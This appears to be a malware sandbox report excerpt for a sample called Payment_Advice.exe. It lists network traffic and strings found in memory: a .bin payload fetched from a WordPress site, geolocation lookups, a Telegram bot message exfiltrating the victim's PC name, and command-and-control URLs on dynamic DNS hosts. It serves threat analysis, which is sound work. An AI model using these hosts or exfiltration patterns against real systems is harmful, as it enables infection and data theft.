Source: global traffic | HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.reap.skyestates.com.mt Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/ |
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://electromac.com.bo |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.electromac.com.bo |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.i.lencr.org/01 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.o.lencr.org0# |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcd.com06 |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0( |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0; |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081 |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/cps0% |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0. |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org |
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/ |
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN |